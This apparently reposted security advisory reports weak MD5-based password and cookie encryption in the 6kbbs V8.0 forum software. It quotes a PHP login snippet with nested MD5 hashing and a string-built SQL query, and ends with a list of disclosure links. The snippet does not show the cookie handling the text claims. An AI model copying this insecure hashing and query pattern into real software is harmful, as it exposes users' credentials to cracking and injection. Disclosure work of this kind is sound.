<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the code simple, easy to use, powerful, fast and so on. It is an excellent community forum program. The program is simple but not simple; fast, small; Interface generous and good scalability; functional and practical pursuing superior performance, good interface, the user's preferred utility functions. Forum Technical realization (a) interface : using XHTML + CSS structure, so the structure of the page , easy to modify the interface ; save the transmission static page code , greatly reducing the amount of data transmitted over the network ; improve the interface scalability , more in line with WEB standards, support Internet Explorer, FireFox, Opera and other major browsers. (b) Program : The ASP + ACCESS mature technology , the installation process is extremely simple , the environment is also very common."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"(1) PHP version : (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b) Currently ( July 2010 ) is still in the testing phase , 6kbbs V8.0 is the latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent community forum process . The program is simple but not simple ; fast , small ; interface generous and good scalability ; functional and practical . pursue superiority , good interface , practical functions of choice for subscribers."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs web application has a computer security problem. It can be exploited by weak encryption attacks. The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Several 6kbbs products 0-day web cyber bugs have been found by some other bug hunter researchers before. 6kbbs has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many of the web securities have been published here.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Source Code:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><?php</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">if(empty($row)){</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $extrow=$db->row_select_one("users","username='{$username}'");</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> if(!empty($extrow) && !empty($extrow['salt'])){</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $row=$extrow;</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $new_row["userpass"]=$userpass_encrypt;</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $new_row["salt"]="";</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $db->row_update("users",$new_row,"id={$extrow['id']}");</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> }</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> }</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">}</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">?></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Source Code From:</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">We can see that "userpass" stored in cookie was encrypted using "$userpass" user password directly. And there is no "HttpOnly" attribute at all. Since md5 is used for the encryption, it is easy for hackers to break the encrypted message.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"The MD5 message-digest cryptography algorithm is a widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32 digit hexadecimal number. Papers about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile, researchers focusing on it spread in Computer Science, Computer Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety of cryptographic applications, and is also commonly used to verify data integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier hash function, MD4. The source code in RFC 1321 contains a "by attribution" RSA license." (Wikipedia)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">References:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Jun/34"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Jun/34</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/06/11/6"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/06/11/6</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=143405936018977&w=2"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02160.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02160.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://packetstormsecurity.com/files/132270/6kbbs-7.1-8.0-Weak-Cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://packetstormsecurity.com/files/132270/6kbbs-7.1-8.0-Weak-Cryptography.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2092"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2092</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/234603051201551415853846/#"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551415853846/#</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://essaybeans.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://essaybeans.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://mathfas.wordpress.com/2015/06/14/6kbbs-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/06/14/6kbbs-weak-encryption/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://securityrelated.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://vulnerabilitypost.wordpress.com/2015/06/11/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://vulnerabilitypost.wordpress.com/2015/06/11/6kbbs-v8-0-weak-encryption/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-security/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-security/6kbbs-v8-0-weak-encryption/</span></a></div>
